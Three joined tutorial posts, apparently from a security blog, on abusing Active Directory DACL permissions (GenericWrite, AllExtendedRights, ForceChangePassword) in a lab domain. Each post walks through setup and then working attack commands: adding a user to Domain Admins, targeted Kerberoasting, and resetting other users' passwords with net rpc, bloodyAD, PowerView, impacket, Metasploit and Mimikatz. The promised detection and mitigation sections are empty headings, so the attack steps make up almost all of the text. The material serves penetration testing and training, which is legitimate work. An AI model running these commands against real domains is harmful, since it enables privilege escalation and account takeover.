Abusing AD-DACL: GenericWrite

 In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the GenericWrite permission in Active Directory environments. This permission can be exploited by attackers to update attributes such as group memberships, account permissions, or even execute privilege escalation by modifying login scripts or service principals.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to GenericWrite attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

Abusing AD-DACL- GenericWrite

GenericWrite Permission

Prerequisites

Lab Setup – User Owns GenericWrite Permission on the Domain Admin Group

Exploitation Phase I – User Owns GenericWrite Permission on a Group

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Account Manipulation (T1098)

• Linux Net RPC – Samba
• Linux Bloody AD
• Windows Net command
• Windows PowerShell – Powerview

Lab Setup – User Owns GenericWrite Permission on Another User

Exploitation Phase II – User Owns GenericWrite Permission on Another User

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Kerberoasting (T1558.003)

• Linux Python Script – TargetedKerberoast
• Windows PowerShell – Powerview

Detection & Mitigation

 

GenericWrite Permission

The GenericWrite permission in Active Directory allows a user to modify all writable attributes of an object, excluding properties requiring special permissions like resetting passwords.

With GenericWrite over a user, you can write to the "servicePrincipalNames" attribute and perform a targeted kerberoasting attack.

With GenericWrite over a group, add yourself or another principal you control to the group.

With GenericWrite over a computer, you can write to the “msds-KeyCredentialLink” attribute. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using Kerberos PKINIT.

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD
• Windows 10/11 – As Client

Lab Setup – User Owns GenericWrite Permission on the Domain Admin Group

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

·       Install Windows Server (2016 or 2019 recommended).

·       Promote it to a Domain Controller by adding the Active Directory Domain Services role.

·       Set up the domain (e.g., ignite.local).

User Accounts:

·       Create a standard user account named Anuradha.

net user anuradha Password@1 /add /domain

 

Assign the "GenericWrite" Privilege to Anuradha:

Once your AD environment is set up, you need to assign the "GenericWrite" privilege to Anuradha for the Domain Admins group.

Steps:

·       Open Active Directory Users and Computers (ADUC) on the Domain Controller.

·       Enable the Advanced Features view by clicking on View > Advanced Features.

·       Locate the Domain Admins group in the Users container.

 

Right-click on Domain Admins and go to Properties.

 

Go to the Security tab, and click on Add button

 

In the “Enter the object name to select” box, type Anuradha and click Check Names and click on OK.

 

 

In the Permissions section, check the box for Write permission.

 

Selecting the Write checkbox automatically enables the "Add/remove self as member" checkbox and Apply the settings.

At this point, Anuradha now has GenericWrite and AddSelf rights over the Domain Admins group, meaning they can add themselves or another principal they control to the group.

 

Exploitation Phase I – User Owns GenericWrite Permission on a Group

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Anuradha has the GenericWrite permission on the Domain Admins group.

bloodhound-python -u anuradha -p Password@1 -ns 192.168.1.7 -d ignite.local -c All

 

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

 

Thus, it has shown the Anuradha User has GenericWrite and SelfAdd privilege to Domain Admin group.

 

Method for Exploitation – Account Manipulation (T1098)

Linux Net RPC – Samba

The tester can abuse this permission by adding Anuradha User into Domain Admin group and list the domain admin members to ensure that Anuradha Users becomes Domain Admin.

net rpc group addmem "Domain Admins" anuradha -U ignite.local/anuradha%'Password@1' -S 192.168.1.7

Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.7" -d "ignite.local" -u "anuradha" -p "Password@1" add groupMember "Domain Admins" "anuradha"

Windows Net command

This can be achieved with a native command line, using windows net command.

net group "domain admins" anuradha /add /domain

thus, from user property we can see Anuradha user has become the member of domain admin.

 

Windows PowerShell - Powerview

The attacker can add a user/group/computer to a group. This can be achieved with with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).

powershell -ep bypass

Import-Module .\PowerView.ps1

$SecPassword = ConvertTo-SecureString 'Password@1' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('ignite.local\anuradha', $SecPassword)

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'anuradha' -Credential $Cred

 

Lab Setup – User Owns GenericWrite Permission on Another User

Here, in this lab setup, we will create two users’ Krishna and Radha, where the user Radha has GenericWrite permission over the Krishna user.

Create the AD Environment and User accounts

·       Create two AD user accounts named Krishna and Radha.

 

net user krishna Password@1 /add /domain

net user radha Password@1 /add /domain

 

Assign the "GenericWrite" Privilege:

·       Open Active Directory Users and Computers (ADUC) on the Domain Controller.

·       Enable the Advanced Features view by clicking on View > Advanced Features.

·       Locate User Krishna in the Users container.

·       Right-click on Krishna User and go to Properties.

 

1.       Go to the Security tab, and click on Add button

2.       In the “Enter the object name to select” box, type Radha and click Check Names and click on OK.

3.       Select Radha user and in the Permissions section, check the box for Write permission.

4.       Apply the settings.

At this point, Radha now has GenericWrite permission for Krishna user.

 

 

Exploitation Phase II – User Owns GenericWrite Permission on Another User

Bloodhound - Hunting for Weak Permission

Hunting for First-Degree Object Control for the Radha user, as demonstrated in the previous steps.

bloodhound-python -u anuradha -p Password@1 -ns 192.168.1.7 -d ignite.local -c All

 

From the graph it can be observed that the Radha user owns GenericWrite privilege on Krishna user.

 

Method for Exploitation – Kerberoasting (T1558.003)

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target.

TargetedKerberoast

From UNIX-like systems, this can be done with targetedKerberoast.py (Python).

Further, with the help of John the Ripper end the dictionary such as Rock You can help the attacker to brute force the weak password.

./targetedKerberoast.py --dc-ip '192.168.1.7' -v -d 'ignite.local' -u 'radha' -p 'Password@1'

 

Windows PowerShell - Powerview

From Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).

powershell -ep bypass

Import-Module .\PowerView.ps1

Set-DomainObject -Identity 'krishna' -Set @{serviceprincipalname='nonexistent/hacking'}

Get-DomainUser 'krishna' | Select serviceprincipalname

$User = Get-DomainUser 'krishna'

$User | Get-DomainSPNTicket

 

Detection & Mitigation

Abusing AD-DACL: AllExtendedRights

In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the AllExtendedRights permission in Active Directory environments. With this permission, attackers can escalate privileges, gain persistent access, and potentially take control of critical directory resources, making it a powerful foothold in compromising a domain.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to AllExtendedRights attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

Abusing AD-DACL- AllExtendedRights

AllExtendedRights Permission

Prerequisites

Lab Setup – User Owns AllExtendedRights Permission

Exploitation – User Owns AllExtendedRights Permission

Bloodhound - Hunting for Weak Permission

Method for Exploitation – Change Password (T1110.001)

• Linux Net RPC – Samba
• Linux Net RPC – Rpcclient
• Linux Net RPC – BloodAD
• Windows PowerShell - Powerview

Detection & Mitigation

 

AllExtendedRights Permission

Extended rights are special rights granted on objects which allow reading of privileged attributes, as well as performing special actions.

This permission allows for resetting passwords on User objects and for crafting a Resource-Based Constrained Delegation (RBCD) attack for Computer objects

If a domain object with AllExtendedRights permissions on the domain object itself is compromised, that domain object will have both the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privilege. Both rights allow a principal to replicate objects from the Domain (DCSync).

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD
• Windows 10/11 – As Client

Lab Setup – User Owns AllExtendedRights Permission

Here, in this lab setup, we will create two users’ Kavish and Geet, and will assign Geet user “AllExtendedRights” permission for Kavish User.

1. Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

• Domain Controller:
• Install Windows Server (2016 or 2019 recommended).
• Promote it to a Domain Controller by adding the Active Directory Domain Services role.
• Set up the domain (e.g., ignite.local).
• User Accounts:
• Create two AD user accounts named Kavish and Geet.

net user kavish Password@1 /add /domain

net user geet Password@1 /add /domain

 

2.       Assign the "AllExtendedRights" Privilege to Geet for Kavish User:

Once your AD environment is set up, you need to assign the "AllExtendedRights" privilege to Geet for Kavish user.

• Steps:
1. Open Active Directory Users and Computers (ADUC) on the Domain Controller.
2. Enable the Advanced Features view by clicking on View > Advanced Features.
3. Locate User Kavish in the Users container.
4. Right-click on Kavish User and go to Properties.

 

5. Go to the Security tab, and click on Add button

6. In the “Enter the object name to select” box, type Geet and click Check Names and click on OK.

7. Select Geet user and click on advanced option.

8. In the Advanced security settings box, double-click on Geet user’s permission entry.

9. In the Permissions section, check the box for All Extended Rights permission.
10. Apply the settings.

 

At this point, Geet now has AllExtendedRights permission for Kavish user, meaning Geet can change the password of Kavish user’s account without knowing their current password

 

Exploitation

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Geet has the AllExtendedRights permission for Kavish user.

bloodhound-python -u geet -p Password@1 -ns 192.168.1.8 -d ignite.local -c All

 

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

 

Thus, it has shown that Geet User has AllExtendedRights privilege for Kavish user.

Method for Exploitation – Change Password (T1110.001)

The tester can abuse this permission by changing password for Kavish user without knowing their current password.

1. Linux Net RPC – Samba

It can be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients.

net rpc password kavish 'Password@987' -U ignite.local/geet%'Password@1' -S 192.168.1.8

2.       Linux Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.8" -d "ignite.local" -u "geet" -p "Password@1" set password "kavish" "Password@987"

3.       Linux Net RPC – Rpcclient

The rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.

rpcclient -U ignite.local/geet 192.168.1.8

setuserinfo kavish 23 Ignite@987

4.       Windows PowerShell - Powerview

The attacker can change the password of the user using PowerView module. This can be achieved with Set-DomainUserPassword cmdlet.

powershell -ep bypass

Import-Module .\PowerView.ps1

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force

Set-DomainUserPassword -Identity 'kavish' -AccountPassword $NewPassword

Or the above can be achieved in verbose mode as well

Set-DomainUserPassword -Identity 'kavish' -Verbose

 

Detection & Mitigation

Abusing AD-DACL: ForceChangePassword

In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the ForcePasswordChange permission in Active Directory environments. This permission is especially dangerous for privileged accounts, as it enables lateral movement and unauthorized access across systems by impersonating the compromised account.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to ForcePasswordChange attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

• ForceChangePassword Right
• Prerequisites
• Lab Setup – User Owns ForceChangePassword Rights
• Exploitation – User Owns ForceChangePassword Rights
• Bloodhound – Hunting for Weak Permission

Method for Exploitation – Change Password (T1110.001)

• Linux Net RPC – Samba
• Linux – pth-toolkit
• Linux Net RPC – Rpcclient
• Linux Net RPC – BloodAD
• Linux – ldap_shell tool
• Linux – impacket-changepasswd
• Windows PowerShell – Powerview
• Windows – Mimikatz

Detection & Mitigation

 

ForceChangePassword Right

This permission provides right to change the password of a user account without knowing their current password.

This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD
• Windows 10/11 – As Client

Lab Setup – User Owns ForceChangePassword Rights

Here, in this lab setup, we will create two users’ Raj and Aarti, and will assign Raj user “Reset Password” rights for Aarti User.

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

• Domain Controller:
• Install Windows Server (2016 or 2019 recommended).
• Promote it to a Domain Controller by adding the Active Directory Domain Services role.
• Set up the domain (e.g., ignite.local).
• User Accounts:
• Create two AD user accounts named Raj and Aarti.

net user raj Password@1 /add /domain

net user aarti Password@1 /add /domain

Assign the "ForceChangePassword" Privilege to Raj for Aarti User:

Once your AD environment is set up, you need to assign the "ForceChangePassword" rights to Raj for Aarti user.

• Steps:

Open Active Directory Users and Computers (ADUC) on the Domain Controller.

Enable the Advanced Features view by clicking on View > Advanced Features.

Locate User Aarti in the Users container.

Right-click on Aarti User and go to Properties.

Go to the Security tab. And click on Add button

 

In the “Enter the object name to select” box, type Raj and click Check Names.

In the Permissions section, check the box for Reset Password permission.

Apply the settings.

 

At this point, Raj now has Reset Password rights for Aarti user, meaning Raj can change the password of Aarti user’s account without knowing their current password.

Alternate method of lab setup with Impacket

Alternatively, lab setup can be done with the help of impacket’s dacledit script

impacket-dacledit -action 'write' -rights 'ResetPassword' -principal 'raj' -target-dn 'CN=aarti,CN=Users,DC=ignite,DC=local' 'ignite.local'/'administrator':'Ignite@987' -dc-ip 192.168.1.48

 

Exploitation

Bloodhound - Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Raj has the ForceChangePassword rights for Aarti user.

bloodhound-python -u raj -p Password@1 -ns 192.168.1.48 -d ignite.local -c All

 

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

 

Thus, it has shown that Raj User has ForceChangePassword privilege for Aarti user.

 

Method for Exploitation – Change Password (T1110.001)

The tester can abuse this permission by changing password for Aarti user without knowing their current password.

1. Linux Net RPC – Samba

It can be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients.

net rpc password aarti 'Password@987' -U ignite.local/raj%'Password@1' -S 192.168.1.48

2.      Linux – pth-toolkit

The pth-toolkit can also be used to run net commands with pass-the-hash.

pth-net rpc password "aarti" -U ignite.local/"raj"%"64FBAE31CC352FC26AF97CBDEF151E03:"BD0F21ED526A885B378895679A412387" -S 192.168.1.48

3.      Linux Net RPC – Rpcclient

The rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.

rpcclient -U ignite.local/raj 192.168.1.48

setuserinfo aarti 23 Password@987

4.      Linux Bloody AD

It can also be achieved using bloodyAD

bloodyAD --host "192.168.1.48" -d "ignite.local" -u "raj" -p "Password@1" set password "aarti" "Password@987"

5.      Linux – ldap_shell tool

Alternatively, it can be achieved using ldap_shell

ldap_shell ignite.local/raj:Password@1 -dc-ip 192.168.1.48

change_password aarti Password@987

6.      Linux – impacket-changepasswd

The smbpasswd tool from Impacket can change a user's password over SMB protocol without knowing their current password.

impacket-changepasswd ignite.local/aarti@192.168.1.48 -newpass Password@1234 -altuser ignite.local/raj -altpass Password@1 -reset

Metasploit

This module allows Active Directory users to change their own passwords, or reset passwords for accounts they have privileges over.

use auxiliary/admin/ldap/change_password

set rhosts 192.168.1.48

set domain ignite.local

set username raj

set password Password@1

set target_user aarti

set new_password Password@7654

run

7.      Windows PowerShell - Powerview

The attacker can change the password of the user using PowerView module. This can be achieved with Set-DomainUserPassword cmdlet.

powershell -ep bypass

Import-Module .\PowerView.ps1

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force

Set-DomainUserPassword -Identity 'aarti' -AccountPassword $NewPassword

8.      Windows – Mimikatz

Mimikatz can directly set a new NTLM hash for a user's account without requiring the current password.

lsadump::setntlm /server:ignite.local /user:aarti /password:Password@9876